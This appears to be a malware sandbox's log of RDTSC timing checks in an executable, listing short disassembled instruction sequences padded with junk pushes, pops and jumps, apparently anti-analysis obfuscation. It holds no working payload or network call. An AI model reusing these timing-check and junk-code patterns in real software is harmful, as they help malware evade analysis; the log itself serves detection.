    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 117B0B6 second address: 117B0C0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F30F50FDE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 117B0C0 second address: 117B0CF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F30F4CF343Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 117B0CF second address: 117B0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F30F50FDE33h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 117B0EE second address: 117B10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F30F4CF3440h 0x00000009 popad 0x0000000a jl 00007F30F4CF3438h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1181D05 second address: 1181D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1181D09 second address: 1181D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1183FEF second address: 1183FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1183FF5 second address: 1184010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F30F4CF343Ch 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F30F4CF3436h 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1184010 second address: 1184016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 119160B second address: 1191616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F30F4CF3436h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1191207 second address: 119121B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F30F50FDE2Dh 0x0000000b pop edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A64A2 second address: 11A64A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A64A6 second address: 11A64C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F50FDE38h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A64C2 second address: 11A6520 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3446h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F30F4CF3444h 0x00000012 push edx 0x00000013 jmp 00007F30F4CF3442h 0x00000018 jmp 00007F30F4CF3448h 0x0000001d pop edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A6520 second address: 11A6526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A6526 second address: 11A653F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3445h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A6AC2 second address: 11A6AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F30F50FDE28h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A6AD3 second address: 11A6ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F30F4CF3436h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A7351 second address: 11A7357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A7357 second address: 11A736F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b jo 00007F30F4CF3436h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11AA32E second address: 11AA333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11ACE48 second address: 11ACE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11ACF1B second address: 11ACF83 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F30F50FDE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jg 00007F30F50FDE3Eh 0x00000012 nop 0x00000013 jc 00007F30F50FDE2Ah 0x00000019 mov dx, DDB8h 0x0000001d push 00000004h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F30F50FDE28h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 push 6ADA4672h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F30F50FDE2Bh 0x00000045 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11ACF83 second address: 11ACF8D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F30F4CF343Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11B0043 second address: 11B004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11AFBCA second address: 11AFBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11AFBCF second address: 11AFBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11B1A5F second address: 11B1A65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11B1A65 second address: 11B1A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11B1A69 second address: 11B1A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11B1A6F second address: 11B1A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11B1A79 second address: 11B1A7F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C8BE5 second address: 10C8C04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F30F50FDE2Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F30F50FDE26h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C8C04 second address: 10C8C08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0814 second address: 4EF0818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0818 second address: 4EF081E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF081E second address: 4EF0824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0824 second address: 4EF0828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0828 second address: 4EF082C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF082C second address: 4EF083B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF083B second address: 4EF083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF083F second address: 4EF0845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0845 second address: 4EF08CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F30F50FDE34h 0x00000010 mov ah, FDh 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 push edi 0x00000017 call 00007F30F50FDE36h 0x0000001c pop esi 0x0000001d pop ebx 0x0000001e pushfd 0x0000001f jmp 00007F30F50FDE30h 0x00000024 sub si, F798h 0x00000029 jmp 00007F30F50FDE2Bh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F30F50FDE35h 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF08CC second address: 4EF08D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF08D2 second address: 4EF08D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF08D6 second address: 4EF09BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F30F4CF3449h 0x00000011 xchg eax, ecx 0x00000012 pushad 0x00000013 mov edx, eax 0x00000015 pushfd 0x00000016 jmp 00007F30F4CF3448h 0x0000001b or cx, 0DE8h 0x00000020 jmp 00007F30F4CF343Bh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 jmp 00007F30F4CF3446h 0x0000002d push eax 0x0000002e jmp 00007F30F4CF343Bh 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 mov ecx, 3CA374DBh 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F30F4CF343Eh 0x00000041 sub al, FFFFFFA8h 0x00000044 jmp 00007F30F4CF343Bh 0x00000049 popfd 0x0000004a mov bh, ah 0x0000004c popad 0x0000004d popad 0x0000004e lea eax, dword ptr [ebp-04h] 0x00000051 jmp 00007F30F4CF343Bh 0x00000056 nop 0x00000057 jmp 00007F30F4CF3446h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F30F4CF343Eh 0x00000064 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF09BB second address: 4EF09CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F50FDE2Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0AC4 second address: 4EF0ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0ACA second address: 4EF0ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0046 second address: 4EE004C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE023C second address: 4EE0240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0240 second address: 4EE0246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0246 second address: 4EE024C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE024C second address: 4EE02AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF343Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F30F4CF3440h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F30F4CF3441h 0x00000019 and eax, 6E9E7986h 0x0000001f jmp 00007F30F4CF3441h 0x00000024 popfd 0x00000025 mov eax, 603CCB37h 0x0000002a popad 0x0000002b nop 0x0000002c pushad 0x0000002d movzx eax, di 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE02AA second address: 4EE02AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE02D7 second address: 4EE02DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE02DD second address: 4EE02E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE02E1 second address: 4EE0324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007F30F4CF3449h 0x0000000f jg 00007F3165A015BEh 0x00000015 jmp 00007F30F4CF343Eh 0x0000001a js 00007F30F4CF34CDh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0324 second address: 4EE0341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0341 second address: 4EE0347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0347 second address: 4EE034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE047A second address: 4EE04A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, 4FEAh 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov eax, ebx 0x0000000f mov edi, 016AF08Eh 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F30F4CF3441h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE04A3 second address: 4EE0504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F30F50FDE2Eh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov al, 52h 0x00000015 movsx edx, si 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F30F50FDE35h 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F30F50FDE38h 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0504 second address: 4EE0513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF343Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE055D second address: 4ED0DFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F30F50FDE2Eh 0x00000010 test esi, esi 0x00000012 pushad 0x00000013 pushad 0x00000014 mov si, 9D73h 0x00000018 push eax 0x00000019 pop edx 0x0000001a popad 0x0000001b call 00007F30F50FDE34h 0x00000020 mov bl, cl 0x00000022 pop edi 0x00000023 popad 0x00000024 je 00007F3165E0BED6h 0x0000002a xor eax, eax 0x0000002c jmp 00007F30F50D755Ah 0x00000031 pop esi 0x00000032 pop edi 0x00000033 pop ebx 0x00000034 leave 0x00000035 retn 0004h 0x00000038 nop 0x00000039 xor ebx, ebx 0x0000003b cmp eax, 00000000h 0x0000003e je 00007F30F50FDFC3h 0x00000044 call 00007F30F90E092Eh 0x00000049 mov edi, edi 0x0000004b pushad 0x0000004c jmp 00007F30F50FDE2Ah 0x00000051 pushfd 0x00000052 jmp 00007F30F50FDE32h 0x00000057 sbb esi, 20B939A8h 0x0000005d jmp 00007F30F50FDE2Bh 0x00000062 popfd 0x00000063 popad 0x00000064 xchg eax, ebp 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4ED0DFF second address: 4ED0E03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4ED0E03 second address: 4ED0E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4ED0E09 second address: 4ED0E55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F30F4CF3448h 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F30F4CF3447h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F30F4CF3440h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4ED0E55 second address: 4ED0E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4ED0E59 second address: 4ED0E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4ED0E5F second address: 4ED0E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4ED0E65 second address: 4ED0EE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F30F4CF343Ch 0x00000015 jmp 00007F30F4CF3445h 0x0000001a popfd 0x0000001b movzx ecx, di 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007F30F4CF343Dh 0x00000025 sbb esi, 0F1DC1F6h 0x0000002b jmp 00007F30F4CF3441h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F30F4CF343Dh 0x0000003a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0B95 second address: 4EE0B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0B9A second address: 4EE0BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F30F4CF343Dh 0x0000000a xor eax, 212C6156h 0x00000010 jmp 00007F30F4CF3441h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test al, al 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007F30F4CF343Ah 0x00000023 pop eax 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0BD7 second address: 4EE0BFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov bh, ch 0x0000000b popad 0x0000000c je 00007F3165DF1BC2h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F30F50FDE2Eh 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0B44 second address: 4EF0B69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F30F4CF343Ah 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0B69 second address: 4EF0B6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0B6F second address: 4EF0B80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F4CF343Dh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0B80 second address: 4EF0BAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F30F50FDE2Ch 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F30F50FDE33h 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0BAF second address: 4EF0BDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F30F4CF343Dh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0BDD second address: 4EF0BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
